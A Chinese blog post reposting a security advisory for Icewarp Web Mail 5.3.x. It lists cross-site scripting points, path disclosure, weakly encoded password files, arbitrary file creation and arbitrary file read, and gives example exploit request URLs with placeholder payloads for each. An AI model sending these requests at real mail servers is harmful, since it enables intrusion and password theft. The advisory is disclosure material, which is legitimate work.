Icewarp Web Mail存在多个安全漏洞

最新推荐文章于 2024-06-20 06:21:06 发布
最新推荐文章于 2024-06-20 06:21:06 发布
阅读量1.6k 收藏
点赞数
分类专栏: 软件经济 个人 安全 文章标签: web domain 脚本 upload 加密 user
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lin_zyang/article/details/3909834
版权
软件经济 同时被 3 个专栏收录
42 篇文章 0 订阅
订阅专栏
个人
39 篇文章 0 订阅
订阅专栏
安全
38 篇文章 0 订阅
订阅专栏

 
受影响系统:
Icewarp Web Mail 5.3.2
Icewarp Web Mail 5.3.0
描述:
--------------------------------------------------------------------------------
MERAK Mail Server使用Icewarp Web Mail作为WEB邮件系统。

Icewarp web mail存在多个安全问题,远程攻击者可以利用这些漏洞建立任意文件,进行跨站脚本,获得安装路径等攻击。

1、多个跨站脚本:

拥有帐户的远程用户,可通过如下页面进行跨站脚本攻击:

login.html
accountsettings_add.html
calendar_addnote.html
calendar_addtask.html
calendar_addevent.html

如:

http://localhost:32000/mail/login.html?username=[xss_here]
http://localhost:32000/mail/accountsettings_add.html?id=[]%26amp;Save_x=1%26amp;account[EMAIL]=hac /
ker%26amp;account[HOST]=blackhat.org%26amp;account[HOSTUSER]=hacker%26amp;account[HOSTPASS]=31337%26amp;accoun /
t[HOSTPASS2]=31337%26amp;accountid=[xss_here] http://localhost:32000/mail/calendar.html -》 /
AddNote -》 [Title]= [xss_here] http://localhost:32000/mail/calendar.html -》 AddTask /
-》 [Note]=[xss_here] http://localhost:32000/mail/calendar.html -》 AddEvent -》 /
[Note]=[xss_here] http://localhost:32000/mail/calendar.html -》 AddEvent -》 [Title]= /
[xss_here] http://localhost:32000/mail/calendar.html -》 AddEvent -》 [Location]= /
[xss_here]


2、安装路径泄露

拥有帐户的远程用户,可通过如下请求获得安装路径信息:

http://localhost:32000/mail/calendar_d.html?id=[sessionid]
http://localhost:32000/mail/calendar_m.html?id=[sessionid]
http://localhost:32000/mail/calendar_w.html?id=[sessionid]
http://localhost:32000/mail/calendar_y.html?id=[sessionid]


3、用户密码简单加密

users.cfg, settings.cfg (XOR), users.dat, user.dat (BASE64)中的用户密码加密非常简单,攻击者可以通过访问这些文件获得用户和管理员密码。

4、任意文件建立

远程用户可以通过提交如下请求,在系统中建立任意内容的文件,文件路径为:[MerakDir]/webmail/users/[Domain]/[User]/accounts.dat.

http://localhost:32000/mail/accountsettings_add.html?id=[sessionid]%26amp;Save_x=1%26amp;account[E /
MAIL]=hacker%26amp;account[HOST]=blackhat.org%26amp;account[HOSTUSER]=hacker%26amp;account[HOSTPASS]=313 /
37%26amp;account[HOSTPASS2]=31337%26amp;accountid=[arbitary text]

5、移动和查看系统任意文件:

拥有帐户的远程用户可以一定本地系统上的任意文件,文件会被移到[MerakDir]/webmail/users/[Domain]/[User]目录 中,并更改为import.tmp,攻击者可以查看此文件或者导出/入到地址簿。此漏洞可以用来查看任意文件内容,或进行拒绝服务攻击。

http://localhost:32000/importaction.html?id=[sessionid]%26amp;importfile=[arbitrary /
path]%26amp;action=upload%26amp;Import=1%26amp;importfile_size=1000000

lin_zyang
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
icewarp_webmail_vulns.nasl
11-08
icewarp_webmail_vulns
破解kerio 系列软件,以及IceWarp Essentials 的好东东
10-17
破解 kerio 系列软件,以及 IceWarp Essentials 的好东东。
目前国内一些Web mail存在的一个安全漏洞
风信子的专栏
02-19 1334
   该Script源于上个世纪(1999年)一次在设置免费email的自动转发时看到一长串的Url时的想法...      看完这篇文章或许你应该赶紧去检查一下你email中的自动转发中有没有别人的email地址:=(  最好不要随便打开别人发给你的HTML文件...   我们知道,国内好些免费email用户登录后的认证都是靠一长串的Url(如我用ShellTools登  录后是"http
新的未修补的Horde Webmail漏洞可以让黑客通过发送邮件接管服务器
qzt961003的博客
06-02 1058
开放源码的Horde Webmail客户端发现一个新的未修补的安全漏洞,黑客只需向受害者发送一封特制的电子邮件,就可以利用这个漏洞在电子邮件伺服器上远程执行代码。
漏洞复现】致远OA webmail.do 任意文件下载 (CNVD-2020-62422)
最新发布
凝聚力安全团队
06-20 352
致远OA webmail.do 处存在任意文件读取,攻击者可以从其中获取网站路径和数据库账号密码等敏感信息进一步攻击。
Roundcube Webmail信息泄露漏洞(CVE-2015-5383)
weixin_30512089的博客
04-10 822
Preface Software:https://roundcube.net/Versions:1.1.x<1.1.2(亲测1.1.5也有效)CVE:CVE-2015-5383Author:adprotasRelease date: 2015-5-5 Reference CVE-2015-5383 Light infodisclosure issue Roundcube W...
Roundcube Webmail跨站脚本漏洞(CVE-2015-5381 )
weixin_30242907的博客
04-10 715
Preface Software: https://roundcube.net/Versions:1.1.x<1.1.2CVE:CVE-2015-5381Author:sroesemannRelease date: 2015-5-30 Reference Roundcube Webmail跨站脚本漏洞(CNVD-2017-08082) XSS via _mbox-paramet...
icewarp_webmail_vulns3.nasl
11-08
icewarp_webmail_vulns3
icewarp_webmail_vulns2.nasl
11-08
icewarp_webmail_vulns2
IceWarp Screen Sharing-crx插件
04-02
Icewarp Webclient是一个包含消息传递通信的一体化集线器,无论是电子邮件,即时消息, 语音,在线会议,文档管理等等。 从您的桌面或On-go访问,您可以真正能够访问工作日中所需的一切,而永远不会离开Icewarp接口...
linux mbox,RoundCube Webmail “_mbox”参数跨站脚本执行漏洞
weixin_29189381的博客
05-28 184
发布日期:2011-08-18更新日期:2012-02-03受影响系统:Apple MacOS X Server 10.7.2Apple MacOS X Server 10.7.1Apple MacOS X Server 10.7RoundCube Webmail 0.5.x不受影响系统:Apple MacOS X Server 10.7.3RoundCube Webmail 0.5.4描述:--...
linux下分析webmail代码,Atmail Webmail Client多个HTML代码注入漏洞
weixin_42327217的博客
05-13 352
发布日期:2012-01-09更新日期:2012-01-10受影响系统:@Mail Atmail Webmail Client 6.3.4描述:--------------------------------------------------------------------------------BUGTRAQ ID: 51313Atmail是商业化Linux消息传送平台提供者。Atmai...
通过 IceWarp WebMail 智能附件轻松发送超大文件
aliasman的专栏
06-23 1218
IceWarp v11 邮件服务器可以设置系统中普通用户的文件夹映射作为该用户的个人 FTP 文件夹,让用户通过 WebMail 去管理和使用邮件服务器端提供的 FTP  服务,然后结合 WebMail 的智能附件(SmartAttach)功能,将超大文件通过邮件方式发送给对方。实际发送的并非是超大文件本身,而是通过 HTTP 方式提供的文件分享下载地址,超大附件的下载操作并不会占用邮件服务器
无意中发现winwebmail系统的一个漏洞
weixin_34242658的博客
03-02 729
或许大家已经都知道了,呵呵~ 就是winwebmail邮件服务器系统,用户名和密码全部存在winwebmail的安装目录中popusers.ini文件里面!包括admin管理员用户!当然,密码是加密的! 或许大家已经都知道了,呵呵~ 就是winwebmail邮件服务器系统,用户名和密码全部存在winwebmail的安装目录中popusers.ini文件里面!包括...
web漏洞之远程命令/代码执行
qq_56438857的博客
07-30 903
总结了常见的远程命令/代码执行漏洞的相关知识点。主要包括管道符,远程代码执行和远程系统命令执行。
Webmail邮件攻防实战技术总结[转]
weixin_33777877的博客
05-23 591
WebMail是指利用浏览器通过web方式来收发电子邮件的服务或技术,不需借助邮件客户端,可以说只要能上网就能使用WebMail,极大地方便了用户对邮件的收发。对于不能熟练使用邮件客户端, 或者在网吧不便使用邮件客户端的用户来说,WebMail更是必不可少的选择。Email能够成为当今Internet上应用最广泛的网络服务,WebMail可谓功不可没。  由于用户的使用不当或者WebMail系统...
Icewarp邮件系统5分钟灾难恢复
恒基杰业
02-18 1380
Icewarp邮件系统5分钟灾难恢复 需求概述 用过Exchange/Domino邮件系统的都深感灾难恢复的复杂及麻烦,Icewarp邮件服务器具备Exchange/Domino系统无法比拟的5分钟灾难恢复功能,方法如下: 管理员只需定期导出Icewarp邮件服务器的MCB文件,如图: 实现方法   备份一个.mcb的文件,或者是如下图设置自动备份,   Icewarp邮件服务
远程命令执行漏洞原理,以及防护绕过方式
Scalzdp的专栏
11-21 1371
今天分享了远程执行指令的原理和如何进行远程执行指令漏洞的利用和绕过方法,远程命令执行的漏洞危害性特别大,攻击者可以利用远程命令执行漏洞给运营团队带来如下一些危害:继承Web服务程序的权限去执行系统命令或读写文件、反弹shell、控制整个网站甚至服务器、进一步内网渗透。在防御的过程我们可以通过加强对用户输入的验证:比如限制输入内容,其次,采用最小权限原则,将程序运行权限限制在最低限度。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值